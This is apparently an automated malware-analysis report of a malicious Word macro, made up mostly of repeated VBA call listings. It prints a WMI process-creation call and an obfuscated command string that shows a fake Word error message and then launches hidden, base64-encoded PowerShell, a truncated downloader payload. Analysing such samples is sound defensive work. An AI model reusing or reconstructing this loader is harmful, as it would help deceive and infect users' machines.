                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        iOplaUSwB

                                        Close

                                        kUseBAG

                                        qdDeFbDk

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        UbNkCZ

                                        Close

                                        fMPBmQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        sbLwDeWJ

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        JjBKEUXqH

                                        Close

                                        GEopA

                                        CreateObject

                                        		CreateObject("winmgmts:win32_process")

                                        BuEcDJvc

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        JkICEEJbA

                                        Close

                                        hrqzdCF

                                        Mid

                                        Len

                                        		Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAA]anw[3gAH]anw[3MAZ]anw[3QBU]anw[3AC0]anw[3ASQ]anw[3B0A]anw[3EUA]anw[3TQA]anw[3gAC]anw[3AAd]anw[3gBh]anw[3AFI]anw[3AaQ]anw[3BBA]anw[3EIA]anw[3TAB]anw[3FAD]anw[3oAM]anw[3AA5]anw[3AFA]anw[3AIA]anw[3AgA]anw[3CgA]anw[3WwB]anw[3UAH]anw[3kAU]anw[3ABF]anw[3AF0]anw[3AKA]anw[3AiA]anw[3HsA]anw[3MAB]anw[39AH]anw[3sAM]anw[3wB9]anw[3AHs]anw[3AMg]anw[3B9A]anw[3HsA]anw[3MQB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3JwA]anw[3sAC]anw[3cAY]anw[3wB0]anw[3AE8]anw[3Acg]anw[3BZA]anw[3CcA]anw[3LAA]anw[3nAC]anw[34Aa]anw[3QBv]anw[3AC4]anw[3ARA]anw[3BJA]anw[3HIA]anw[3RQA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3AHQ]anw[3AZQ]anw[3BNA]anw[3CcA]anw[3KQA]anw[3pAC]anw[3AAI]anw[3AA7]anw[3ACA]anw[3AIA]anw[3AgA]anw[3HMA]anw[3ZQB]anw[3UAC]anw[30Aa]anw[3QB0]anw[3AEU]anw[3ATQ]anw[3AgA]anw[3CgA]anw[3JwB]anw[3WAC]anw[3cAK]anw[3wAn]anw[3AEE]anw[3Acg]anw[3AnA]anw[3CsA]anw[3JwB]anw[3pAE]anw[3EAY]anw[3gBM]anw[3AEU]anw[3AOg]anw[3BhA]anw[3HYA]anw[3NQA]anw[3nAC]anw[3sAJ]anw[3wBM]anw[3ACc]anw[3AKw]anw[3AnA]anw[3G8A]anw[3UgA]anw[3nAC]anw[3kAI]anw[3AAg]anw[3ACg]anw[3AWw]anw[3B0A]anw[3FkA]anw[3cAB]anw[3lAF]anw[30AK]anw[3AAi]anw[3AHs]anw[3AMA]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NAB]anw[39AH]anw[3sAN]anw[3gB9]anw[3AHs]anw[3ANQ]anw[3B9A]anw[3HsA]anw[3MgB]anw[39AC]anw[3IAL]anw[3QBm]anw[3ACA]anw[3AJw]anw[3BTA]anw[3HkA]anw[3UwA]anw[3nAC]anw[3wAJ]anw[3wBl]anw[3AG0]anw[3ALg]anw[3BOA]anw[3GUA]anw[3VAA]anw[3uAF]anw[3MAZ]anw[3QBy]anw[3AHY]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3yAC]anw[3cAL]anw[3AAn]anw[3AEk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3YwB]anw[3lAH]anw[3AAb]anw[3wAn]anw[3ACw]anw[3AJw]anw[3B0A]anw[3E0A]anw[3YQB]anw[3uAG]anw[3EAZ]anw[3wAn]anw[3ACw]anw[3AJw]anw[3BJA]anw[3G4A]anw[3JwA]anw[3sAC]anw[3cAV]anw[3AAn]anw[3ACk]anw[3AIA]anw[3ApA]anw[3CAA]anw[3OwA]anw[3gAC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3ACc]anw[3AKw]anw[3AnA]anw[3GkA]anw[3bAB]anw[3lAG]anw[34AJ]anw[3wAp]anw[3ACs]anw[3AKA]anw[3AnA]anw[3HQA]anw[3bAB]anw[35AE]anw[3MAJ]anw[3wAr]anw[3ACc]anw[3Abw]anw[3BuA]anw[3HQA]anw[3JwA]anw[3pAC]anw[3sAJ]anw[3wBp]anw[3ACc]anw[3AKw]anw[3AoA]anw[3CcA]anw[3bgA]anw[3nAC]anw[3sAJ]anw[3wB1]anw[3AGU]anw[3AJw]anw[3ApA]anw[3CkA]anw[3OwA]anw[3kAE]anw[3QAO]anw[3AAx]anw[3AHY]anw[3AbA]anw[3A2A]anw[3GwA]anw[3PQA]anw[3kAF]anw[3AAM]anw[3QAy]anw[3AFI]anw[3AIA]anw[3ArA]anw[3CAA]anw[3WwB]anw[3jAG]anw[3gAY]anw[3QBy]anw[3AF0]anw[3AKA]anw[3A2A]anw[3DQA]anw[3KQA]anw[3gAC]anw[3sAI]anw[3AAk]anw[3AE8]anw[3AOQ]anw[3A4A]anw[3EUA]anw[3OwA]anw[3kAF]anw[3IAX]anw[3wAx]anw[3AFo]anw[3APQ]anw[3AoA]anw[3CcA]anw[3SwA]anw[3yAC]anw[3cAK]anw[3wAn]anw[3ADY]anw[3ARQ]anw[3AnA]anw[3CkA]anw[3OwA]anw[3gAC]anw[3AAK]anw[3ABH]anw[3AGM]anw[3AaQ]anw[3AgA]anw[3HYA]anw[3QQB]anw[3yAE]anw[3kAQ]anw[3QBC]anw[3AEw]anw[3AZQ]anw[3A6A]anw[3DAA]anw[3OQB]anw[3wAC]anw[3AAK]anw[3QAu]anw[3AFY]anw[3AQQ]anw[3BMA]anw[3HUA]anw[3ZQA]anw[36AD]anw[3oAI]anw[3gBD]anw[3AFI]anw[3ARQ]anw[3BhA]anw[3GAA]anw[3VAB]anw[3) -> 17453

                                        SYgbDdCEH

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        IuDSasFIm

                                        Close

                                        LUJoKCCQ

                                        xDUMl

                                        CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: yKTqX

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: PdhtG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: QAhNFQ

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WOdrGBJG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: GPfHF

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: hKjoxAHI

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: ODgRUaAId

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: uLRAyCA

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: LBFSC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: YBonG

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateObject

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: CreateTextFile

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: WriteLine

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: noyuzC

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: Close

                                        Part of subcall function Slz39ct0lz_ksnd@A81c_pcot0t3c8: gxwmz

                                        CreateTextFile

                                        WriteLine

                                        WriteLine

                                        WriteLine

                                        TFPJDBSa

                                        Close

                                        hKDFekFGF

                                        Create

